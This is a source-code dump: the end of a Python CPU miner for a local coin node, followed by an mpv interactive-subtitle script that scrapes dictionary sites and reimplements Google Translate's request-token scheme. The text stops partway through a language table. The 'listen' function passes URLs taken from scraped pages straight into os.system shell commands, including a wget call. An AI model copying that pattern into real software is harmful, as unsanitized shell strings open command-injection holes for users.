target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = EvolveChainRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9877
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
interSubs.py
|
#! /usr/bin/env python
# v. 2.10
# Interactive subtitles for `mpv` for language learners.
import os, subprocess, sys
import random, re, time
import requests
import threading, queue
import calendar, math, base64
import numpy
import ast
from bs4 import BeautifulSoup
from urllib.parse import quote
from json import loads
import warnings
from six.moves import urllib
from PyQt5.QtCore import Qt, QThread, QObject, pyqtSignal, pyqtSlot, QSize
from PyQt5.QtWidgets import QApplication, QFrame, QVBoxLayout, QHBoxLayout, QLabel, QSizePolicy, QWidget
from PyQt5.QtGui import QPalette, QPaintEvent, QPainter, QPainterPath, QFont, QFontMetrics, QColor, QPen, QBrush
pth = os.path.expanduser('~/.config/mpv/scripts/')
os.chdir(pth)
import interSubs_config as config
pons_combos = ['enes', 'enfr', 'deen', 'enpl', 'ensl', 'defr', 'dees', 'deru', 'depl', 'desl', 'deit', 'dept', 'detr', 'deel', 'dela', 'espl', 'frpl', 'itpl', 'plru', 'essl', 'frsl', 'itsl', 'enit', 'enpt', 'enru', 'espt', 'esfr', 'delb', 'dezh', 'enzh', 'eszh', 'frzh', 'denl', 'arde', 'aren', 'dade', 'csde', 'dehu', 'deno', 'desv', 'dede', 'dedx']
# returns ([[word, translation]..], [morphology = '', gender = ''])
# pons.com
def pons(word):
if config.lang_from + config.lang_to in pons_combos:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_from, config.lang_to, config.lang_from)
else:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_to, config.lang_from, config.lang_from)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('dl')
for tr in trs:
try:
tr1 = tr.find('dt').find('div', class_="source").get_text()
tr1 = re.sub('\n|\r|\t', ' ', tr1)
tr1 = re.sub(' +', ' ', tr1).strip()
if not len(tr1):
tr1 = '-'
tr2 = tr.find('dd').find('div', class_="target").get_text()
tr2 = re.sub('\n|\r|\t', ' ', tr2)
tr2 = re.sub(' +', ' ', tr2).strip()
if not len(tr2):
tr2 = '-'
except:
continue
pairs.append([tr1, tr2])
if config.number_of_translations_to_save and len(pairs) > config.number_of_translations_to_save:
break
try:
word_descr = soup.find_all('h2', class_='')
if '<i class="icon-bolt">' not in str(word_descr[0]):
word_descr = re.sub('\n|\r|\t', ' ', word_descr[0].get_text())
word_descr = re.sub(' +', ' ', word_descr).replace('<', '<').replace('>', '>').replace(' · ', '·').replace(' , ', ', ').strip()
else:
word_descr = ''
except:
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
if len(word_descr):
if word_descr.split(' ')[-1] == 'm':
word_descr_gen = [word_descr[:-2], 'm']
elif word_descr.split(' ')[-1] == 'f':
word_descr_gen = [word_descr[:-2], 'f']
elif word_descr.split(' ')[-1] == 'nt':
word_descr_gen = [word_descr[:-3], 'nt']
else:
word_descr_gen = [word_descr, '']
else:
word_descr_gen = ['', '']
return pairs, word_descr_gen
# https://github.com/ssut/py-googletrans
class TokenAcquirer_DISABLED:
"""Google Translate API token generator
translate.google.com uses a token to authorize the requests. If you are
not Google, you do have this token and will have to pay for use.
This class is the result of reverse engineering on the obfuscated and
minified code used by Google to generate such token.
The token is based on a seed which is updated once per hour and on the
text that will be translated.
Both are combined - by some strange math - in order to generate a final
token (e.g. 744915.856682) which is used by the API to validate the
request.
This operation will cause an additional request to get an initial
token from translate.google.com.
Example usage:
>>> from googletrans.gtoken import TokenAcquirer
>>> acquirer = TokenAcquirer()
>>> text = 'test'
>>> tk = acquirer.do(text)
>>> tk
950629.577246
"""
import httpx
def rshift(self, val, n):
"""python port for '>>>'(right shift with padding)
"""
return (val % 0x100000000) >> n
RE_TKK = re.compile(r'tkk:\'(.+?)\'', re.DOTALL)
RE_RAWTKK = re.compile(r'tkk:\'(.+?)\'', re.DOTALL)
def __init__(self, client = httpx, tkk='0', host='translate.googleapis.com'):
self.client = client
self.tkk = tkk
self.host = host if 'http' in host else 'http://' + host
def _update(self):
"""update tkk
"""
# we don't need to update the base TKK value when it is still valid
now = math.floor(int(time.time() * 1000) / 3600000.0)
if self.tkk and int(self.tkk.split('.')[0]) == now:
return
r = self.client.get(self.host)
raw_tkk = self.RE_TKK.search(r.text)
if raw_tkk:
self.tkk = raw_tkk.group(1)
return
try:
# this will be the same as python code after stripping out a reserved word 'var'
code = self.RE_TKK.search(r.text).group(1).replace('var ', '')
# unescape special ascii characters such like a \x3d(=)
code = code.encode().decode('unicode-escape')
except AttributeError:
raise Exception('Could not find TKK token for this request.\nSee https://github.com/ssut/py-googletrans/issues/234 for more details.')
except:
raise
if code:
tree = ast.parse(code)
visit_return = False
operator = '+'
n, keys = 0, dict(a=0, b=0)
for node in ast.walk(tree):
if isinstance(node, ast.Assign):
name = node.targets[0].id
if name in keys:
if isinstance(node.value, ast.Num):
keys[name] = node.value.n
# the value can sometimes be negative
elif isinstance(node.value, ast.UnaryOp) and \
isinstance(node.value.op, ast.USub): # pragma: nocover
keys[name] = -node.value.operand.n
elif isinstance(node, ast.Return):
# parameters should be set after this point
visit_return = True
elif visit_return and isinstance(node, ast.Num):
n = node.n
elif visit_return and n > 0:
# the default operator is '+' but implement some more for
# all possible scenarios
if isinstance(node, ast.Add): # pragma: nocover
pass
elif isinstance(node, ast.Sub): # pragma: nocover
operator = '-'
elif isinstance(node, ast.Mult): # pragma: nocover
operator = '*'
elif isinstance(node, ast.Pow): # pragma: nocover
operator = '**'
elif isinstance(node, ast.BitXor): # pragma: nocover
operator = '^'
# a safety way to avoid Exceptions
clause = compile('{1}{0}{2}'.format(
operator, keys['a'], keys['b']), '', 'eval')
value = eval(clause, dict(__builtin__={}))
result = '{}.{}'.format(n, value)
self.tkk = result
def _lazy(self, value):
"""like lazy evaluation, this method returns a lambda function that
returns value given.
We won't be needing this because this seems to have been built for
code obfuscation.
the original code of this method is as follows:
... code-block: javascript
var ek = function(a) {
return function() {
return a;
};
}
"""
return lambda: value
def _xr(self, a, b):
size_b = len(b)
c = 0
while c < size_b - 2:
d = b[c + 2]
d = ord(d[0]) - 87 if 'a' <= d else int(d)
d = rshift(a, d) if '+' == b[c + 1] else a << d
a = a + d & 4294967295 if '+' == b[c] else a ^ d
c += 3
return a
def acquire(self, text):
a = []
# Convert text to ints
for i in text:
val = ord(i)
if val < 0x10000:
a += [val]
else:
# Python doesn't natively use Unicode surrogates, so account for those
a += [
math.floor((val - 0x10000) / 0x400 + 0xD800),
math.floor((val - 0x10000) % 0x400 + 0xDC00)
]
b = self.tkk if self.tkk != '0' else ''
d = b.split('.')
b = int(d[0]) if len(d) > 1 else 0
# assume e means char code array
e = []
g = 0
size = len(a)
while g < size:
l = a[g]
# just append if l is less than 128(ascii: DEL)
if l < 128:
e.append(l)
# append calculated value if l is less than 2048
else:
if l < 2048:
e.append(l >> 6 | 192)
else:
# append calculated value if l matches special condition
if (l & 64512) == 55296 and g + 1 < size and \
a[g + 1] & 64512 == 56320:
g += 1
l = 65536 + ((l & 1023) << 10) + (a[g] & 1023) # This bracket is important
e.append(l >> 18 | 240)
e.append(l >> 12 & 63 | 128)
else:
e.append(l >> 12 | 224)
e.append(l >> 6 & 63 | 128)
e.append(l & 63 | 128)
g += 1
a = b
for i, value in enumerate(e):
a += value
a = self._xr(a, '+-a^+6')
a = self._xr(a, '+-3^+b+-f')
a ^= int(d[1]) if len(d) > 1 else 0
if a < 0: # pragma: nocover
a = (a & 2147483647) + 2147483648
a %= 1000000 # int(1E6)
return '{}.{}'.format(a, a ^ b)
def do(self, text):
self._update()
tk = self.acquire(text)
return tk
# https://github.com/Saravananslb/py-googletranslation
class TokenAcquirer:
"""Google Translate API token generator
translate.google.com uses a token to authorize the requests. If you are
not Google, you do have this token and will have to pay for use.
This class is the result of reverse engineering on the obfuscated and
minified code used by Google to generate such token.
The token is based on a seed which is updated once per hour and on the
text that will be translated.
Both are combined - by some strange math - in order to generate a final
token (e.g. 464393.115905) which is used by the API to validate the
request.
This operation will cause an additional request to get an initial
token from translate.google.com.
Example usage:
>>> from pygoogletranslation.gauthtoken import TokenAcquirer
>>> acquirer = TokenAcquirer()
>>> text = 'test'
>>> tk = acquirer.do(text)
>>> tk
464393.115905
"""
def __init__(self, tkk='0', tkk_url='https://translate.google.com/translate_a/element.js', proxies=None):
if proxies is not None:
self.proxies = proxies
else:
self.proxies = None
r = requests.get(tkk_url, proxies=self.proxies)
if r.status_code == 200:
re_tkk = re.search("(?<=tkk=\\')[0-9.]{0,}", str(r.content.decode("utf-8")))
if re_tkk:
self.tkk = re_tkk.group(0)
else:
self.tkk = '0'
else:
self.tkk = '0'
def _xr(self, a, b):
size_b = len(b)
c = 0
while c < size_b - 2:
d = b[c + 2]
d = ord(d[0]) - 87 if 'a' <= d else int(d)
d = self.rshift(a, d) if '+' == b[c + 1] else a << d
a = a + d & 4294967295 if '+' == b[c] else a ^ d
c += 3
return a
def acquire(self, text):
a = []
# Convert text to ints
for i in text:
val = ord(i)
if val < 0x10000:
a += [val]
else:
# Python doesn't natively use Unicode surrogates, so account for those
a += [
math.floor((val - 0x10000) / 0x400 + 0xD800),
math.floor((val - 0x10000) % 0x400 + 0xDC00)
]
b = self.tkk
d = b.split('.')
b = int(d[0]) if len(d) > 1 else 0
# assume e means char code array
e = []
g = 0
size = len(a)
while g < size:
l = a[g]
# just append if l is less than 128(ascii: DEL)
if l < 128:
e.append(l)
# append calculated value if l is less than 2048
else:
if l < 2048:
e.append(l >> 6 | 192)
else:
# append calculated value if l matches special condition
if (l & 64512) == 55296 and g + 1 < size and \
a[g + 1] & 64512 == 56320:
g += 1
l = 65536 + ((l & 1023) << 10) + (a[g] & 1023) # This bracket is important
e.append(l >> 18 | 240)
e.append(l >> 12 & 63 | 128)
else:
e.append(l >> 12 | 224)
e.append(l >> 6 & 63 | 128)
e.append(l & 63 | 128)
g += 1
a = b
for i, value in enumerate(e):
a += value
a = self._xr(a, '+-a^+6')
a = self._xr(a, '+-3^+b+-f')
a ^= int(d[1]) if len(d) > 1 else 0
if a < 0: # pragma: nocover
a = (a & 2147483647) + 2147483648
a %= 1000000 # int(1E6)
return '{}.{}'.format(a, a ^ b)
def do(self, text):
tk = self.acquire(text)
return tk
def rshift(self, val, n):
"""python port for '>>>'(right shift with padding)
"""
return (val % 0x100000000) >> n
# translate.google.com
def google(word):
word = word.replace('\n', ' ').strip()
url = 'https://translate.google.com/translate_a/single?client=t&sl={lang_from}&tl={lang_to}&hl={lang_to}&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&otf=1&pc=1&ssel=3&tsel=3&kc=2&q={word}'.format(lang_from = config.lang_from, lang_to = config.lang_to, word = quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
if ' ' in word:
raise Exception('skip saving')
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
acquirer = TokenAcquirer()
tk = acquirer.do(word)
url = '{url}&tk={tk}'.format(url = url, tk = tk)
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
p = loads(p)
try:
pairs.append([p[0][0][0], p[0][0][1]])
except:
pass
if p[1] != None:
for translations in p[1]:
for translation in translations[2]:
try:
t1 = translation[5] + ' ' + translation[0]
except:
t1 = translation[0]
t2 = ', '.join(translation[1])
if not len(t1):
t1 = '-'
if not len(t2):
t2 = '-'
pairs.append([t1, t2])
word_descr = ''
# extra check against double-writing from rouge threads
if ' ' not in word and not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# reverso.net
def reverso(word):
reverso_combos = {'ar':'Arabic', 'de':'German', 'en':'English', 'es':'Spanish', 'fr':'French', 'he':'Hebrew', 'it':'Italian', 'nl':'Dutch', 'pl':'Polish', 'pt':'Portuguese', 'ro':'Romanian', 'ru':'Russian'}
if not config.lang_from in reverso_combos and not config.lang_to in reverso_combos:
return [['Language code is not correct.', '']], ['', '']
url = 'http://context.reverso.net/translation/%s-%s/%s' % (reverso_combos[config.lang_from].lower(), reverso_combos[config.lang_to].lower(), quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all(class_ = re.compile('translation.*ltr.*'))
exmpls = soup.find_all(class_ = 'example')
tr_combined = []
for tr in trs:
tr_combined.append(tr.get_text().strip().replace('\n', ' '))
if len(tr_combined) == 4:
pairs.append(['-', ' :: '.join(tr_combined)])
tr_combined = []
for exmpl in exmpls:
pairs.append([x.strip() for x in exmpl.get_text().split('\n') if len(x.strip())])
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
return pairs, ['', '']
# linguee.com (unfinished; site blocks frequent requests)
def linguee(word):
url = 'https://www.linguee.com/german-english/search?source=german&query=%s' % quote(word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
#p = open('/home/lom/d/1.html', encoding="ISO-8859-15").read()
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('div', class_="lemma featured")
for tr in trs:
pairs.append([tr.find_all('a')[0].get_text(), '-'])
for tr2 in tr.find_all('a')[1:]:
if len(tr2.get_text()):
#print(tr2.get_text())
pairs.append(['-', tr2.get_text()])
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# dict.cc
def dict_cc(word):
url = 'https://%s-%s.dict.cc/?s=%s' % (config.lang_from, config.lang_to, quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
p = re.sub('<div style="float:right;color:#999">\d*</div>', '', p)
p = re.sub('<span style="color:#666;font-size:10px;padding:0 2px;position:relative;top:-3px">\d*</span>', '', p)
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('tr', id = re.compile('tr\d*'))
for tr in trs:
tr2 = tr.find_all('td', class_ = 'td7nl')
pairs.append([tr2[1].get_text(), tr2[0].get_text()])
if config.number_of_translations_to_save and len(pairs) > config.number_of_translations_to_save:
break
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# redensarten-index.de
def redensarten(word):
if len(word) < 3:
return [], ['', '']
url = 'https://www.redensarten-index.de/suche.php?suchbegriff=' + quote(word) + '&bool=relevanz&gawoe=an&suchspalte%5B%5D=rart_ou&suchspalte%5B%5D=rart_varianten_ou&suchspalte%5B%5D=erl_ou&suchspalte%5B%5D=erg_ou'
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'})
p.encoding = 'utf-8'
p = p.text
soup = BeautifulSoup(p, "lxml")
for a in soup.find_all('a', class_ = 'autosyn-icon'):
a.decompose()
try:
table = soup.find_all('table', id = 'tabelle')[0]
trs = table.find_all('tr')
for tr in trs[1:]:
tds = tr.find_all('td')
if len(tds) > 1:
pairs.append([ re.sub(' +', ' ', tds[0].get_text()).strip(), re.sub(' +', ' ', tds[1].get_text()).strip() ])
except:
pass
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# leo.org
def leo(word):
language = config.lang_from if config.lang_from != 'de' else config.lang_to
url = "https://dict.leo.org/dictQuery/m-vocab/%sde/query.xml?tolerMode=nof&rmWords=off&rmSearch=on&searchLoc=0&resultOrder=basic&multiwordShowSingle=on&lang=de&search=%s" % (language, word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
req = requests.get(url.format(lang=language))
content = BeautifulSoup(req.text, "xml")
pairs = []
for section in content.sectionlist.findAll('section'):
if int(section['sctCount']):
for entry in section.findAll('entry'):
res0 = entry.find('side', attrs = {'hc' : '0'})
res1 = entry.find('side', attrs = {'hc' : '1'})
if res0 and res1:
line0 = re.sub('\s+', ' ', res0.repr.getText())
line1 = re.sub('\s+', ' ', res1.repr.getText())
line0 = line0.rstrip('|').strip()
line1 = line1.rstrip('|').strip()
if res0.attrs['lang'] == config.lang_from:
pairs.append([line0, line1])
else:
pairs.append([line1, line0])
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# offline dictionary with word \t translation
def tab_divided_dict(word):
if word in offdict:
tr = re.sub('<.*?>', '', offdict[word]) if config.tab_divided_dict_remove_tags_B else offdict[word]
tr = tr.replace('\\n', '\n').replace('\\~', '~')
return [[tr, '-']], ['', '']
else:
return [], ['', '']
# morfix.co.il
def morfix(word):
url = "http://www.morfix.co.il/en/%s" % quote(word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
req = requests.get(url)
soup = BeautifulSoup(req.text, "lxml")
divs = soup.find_all('div', class_ = 'title_ph')
pairs = []
for div in divs:
he = div.find('div', class_ = re.compile('translation_he'))
he = re.sub('\s+', ' ', he.get_text()).strip()
en = div.find('div', class_ = re.compile('translation_en'))
en = re.sub('\s+', ' ', en.get_text()).strip()
if config.lang_from == 'he':
pairs.append([he, en])
else:
pairs.append([en, he])
word_descr = ''
# extra check against double-writing from rouge threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# deepl.com
# https://github.com/EmilioK97/pydeepl
def deepl(text):
l1 = config.lang_from.upper()
l2 = config.lang_to.upper()
if len(text) > 5000:
return 'Text too long (limited to 5000 characters).'
parameters = {
'jsonrpc': '2.0',
'method': 'LMT_handle_jobs',
'params': {
'jobs': [
{
'kind':'default',
'raw_en_sentence': text
}
],
'lang': {
'source_lang_user_selected': l1,
'target_lang': l2
}
}
}
response = requests.post('https://www2.deepl.com/jsonrpc', json=parameters).json()
if 'result' not in response:
return 'DeepL call resulted in a unknown result.'
translations = response['result']['translations']
if len(translations) == 0 \
or translations[0]['beams'] is None \
or translations[0]['beams'][0]['postprocessed_sentence'] is None:
return 'No translations found.'
return translations[0]['beams'][0]['postprocessed_sentence']
def listen(word, type = 'gtts'):
if type == 'pons':
if config.lang_from + config.lang_to in pons_combos:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_from, config.lang_to, config.lang_from)
else:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_to, config.lang_from, config.lang_from)
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
x = re.findall('<dl id="([a-zA-Z0-9]*?)" class="dl-horizontal kne(.*?)</dl>', p, re.DOTALL)
x2 = re.findall('class="audio tts trackable trk-audio" data-pons-lang="(.*?)"', x[0][1])
for l in x2:
if config.lang_from in l:
mp3 = 'http://sounds.pons.com/audio_tts/%s/%s' % (l, x[0][0])
break
os.system('(cd /tmp; wget ' + mp3 + '; mpv --load-scripts=no --loop=1 --volume=40 --force-window=no ' + mp3.split('/')[-1] + '; rm ' + mp3.split('/')[-1] + ') &')
elif type == 'gtts':
gTTS(text = word, lang = config.lang_from, slow = False).save('/tmp/gtts_word.mp3')
os.system('(mpv --load-scripts=no --loop=1 --volume=75 --force-window=no ' + '/tmp/gtts_word.mp3' + '; rm ' + '/tmp/gtts_word.mp3' + ') &')
elif type == 'forvo':
url = 'https://forvo.com/word/%s/%s/' % (config.lang_from, quote(word))
try:
data = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(data, "lxml")
trs = soup.find_all('article', class_ = 'pronunciations')[0].find_all('span', class_ = 'play')
mp3s = ''
for tr in trs[:2]:
tr = tr['onclick']
tr = re.findall('Play\((.*?)\)', tr)[0]
tr = tr.split(',')[4].replace("'", '')
tr = base64.b64decode(tr)
tr = tr.decode("utf-8")
mp3s += 'mpv --load-scripts=no --loop=1 --volume=111 --force-window=no https://audio00.forvo.com/audios/mp3/%s ; ' % tr
os.system('(%s) &' % mp3s)
except:
return
# https://github.com/Boudewijn26/gTTS-token
class Token:
""" Token (Google Translate Token)
Generate the current token key and allows generation of tokens (tk) with it
Python version of `token-script.js` itself from translate.google.com
"""
SALT_1 = "+-a^+6"
SALT_2 = "+-3^+b+-f"
def __init__(self):
self.token_key = None
def calculate_token(self, text, seed=None):
""" Calculate the request token (`tk`) of a string
:param text: str The text to calculate a token for
:param seed: str The seed to use. By default this is the number of hours since epoch
"""
if seed is None:
seed = self._get_token_key()
[first_seed, second_seed] = seed.split(".")
try:
d = bytearray(text.encode('UTF-8'))
except UnicodeDecodeError:
# This will probably only occur when d is actually a str containing UTF-8 chars, which means we don't need
# to encode.
d = bytearray(text)
a = int(first_seed)
for value in d:
a += value
a = self._work_token(a, self.SALT_1)
a = self._work_token(a, self.SALT_2)
a ^= int(second_seed)
if 0 > a:
a = (a & 2147483647) + 2147483648
a %= 1E6
a = int(a)
return str(a) + "." + str(a ^ int(first_seed))
def _get_token_key(self):
if self.token_key is not None:
return self.token_key
response = requests.get("https://translate.google.com/")
tkk_expr = re.search("(tkk:.*?),", response.text)
if not tkk_expr:
raise ValueError(
"Unable to find token seed! Did https://translate.google.com change?"
)
tkk_expr = tkk_expr.group(1)
try:
# Grab the token directly if already generated by function call
result = re.search("\d{6}\.[0-9]+", tkk_expr).group(0)
except AttributeError:
# Generate the token using algorithm
timestamp = calendar.timegm(time.gmtime())
hours = int(math.floor(timestamp / 3600))
a = re.search("a\\\\x3d(-?\d+);", tkk_expr).group(1)
b = re.search("b\\\\x3d(-?\d+);", tkk_expr).group(1)
result = str(hours) + "." + str(int(a) + int(b))
self.token_key = result
return result
""" Functions used by the token calculation algorithm """
def _rshift(self, val, n):
return val >> n if val >= 0 else (val + 0x100000000) >> n
def _work_token(self, a, seed):
for i in range(0, len(seed) - 2, 3):
char = seed[i + 2]
d = ord(char[0]) - 87 if char >= "a" else int(char)
d = self._rshift(a, d) if seed[i + 1] == "+" else a << d
a = a + d & 4294967295 if seed[i] == "+" else a ^ d
return a
# https://github.com/pndurette/gTTS
class gTTS:
""" gTTS (Google Text to Speech): an interface to Google's Text to Speech API """
# Google TTS API supports two read speeds
# (speed <= 0.3: slow; speed > 0.3: normal; default: 1)
class Speed:
SLOW = 0.3
NORMAL = 1
GOOGLE_TTS_URL = 'https://translate.google.com/translate_tts'
MAX_CHARS = 100 # Max characters the Google TTS API takes at a time
LANGUAGES = {
'af' : 'Afrikaans',
'sq' : 'Albanian',
'ar' : 'Arabic',
